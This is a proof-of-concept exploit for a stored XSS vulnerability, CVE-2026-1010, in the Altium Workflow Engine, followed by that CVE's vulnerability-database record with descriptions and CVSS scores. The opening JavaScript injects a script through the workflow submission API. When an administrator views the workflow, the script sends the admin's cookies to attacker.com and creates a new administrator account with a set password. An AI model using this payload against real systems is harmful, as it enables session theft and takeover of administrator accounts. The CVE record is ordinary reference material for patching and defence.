CVE-2026-1010

// CVE-2026-1010 PoC - Stored XSS in Altium Workflow Engine // Target: Altium Workflow Engine < latest version // Author: Security Researcher // Step 1: Login as low-privilege user and inject XSS payload into workflow form fetch('/api/workflow/submit', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <user_token>' }, body: JSON.stringify({ workflow_name: 'Test Workflow', // Malicious payload injected into workflow field description: '<script>\n // Steal admin session token fetch("https://attacker.com/steal?cookie=" + document.cookie); // Create new admin account fetch("/api/admin/users", { method: "POST", body: JSON.stringify({ username: "attacker_admin", password: "P@ssw0rd123", role: "administrator" }) }); </script>' }) }); // Step 2: When admin views the workflow, payload executes automatically // The injected JavaScript runs in admin's browser context // Attacker can steal session tokens, create admin accounts, or perform admin actions

{"cve": {"id": "CVE-2026-1010", "sourceIdentifier": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "published": "2026-01-15T23:15:51.323", "lastModified": "2026-01-23T19:31:41.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability exists in the Altium Workflow Engine due to missing server-side input sanitization in workflow form submission APIs. A regular authenticated user can inject arbitrary JavaScript into workflow data.\n\nWhen an administrator views the affected workflow, the injected payload executes in the administrator’s browser context, allowing privilege escalation, including creation of new administrator accounts, session token theft, and execution of administrative actions."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en el Altium Workflow Engine debido a la falta de saneamiento de entrada del lado del servidor en las API de envío de formularios de flujo de trabajo. Un usuario autenticado regular puede inyectar JavaScript arbitrario en los datos del flujo de trabajo.\n\nCuando un administrador ve el flujo de trabajo afectado, la carga útil inyectada se ejecuta en el contexto del navegador del administrador, permitiendo la escalada de privilegios, incluyendo la creación de nuevas cuentas de administrador, el robo de tokens de sesión y la ejecución de acciones administrativas."}], "metrics": {"cvssMetricV31": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:altium:on-prem_enterprise_server:8.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "CDEBB57C-6A6D-4FC9-BA14-8324F1F7661C"}]}]}], "references": [{"url": "https://www.altium.com/platform/security-compliance/security-advisories", "source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "tags": ["Vendor Advisory"]}]}}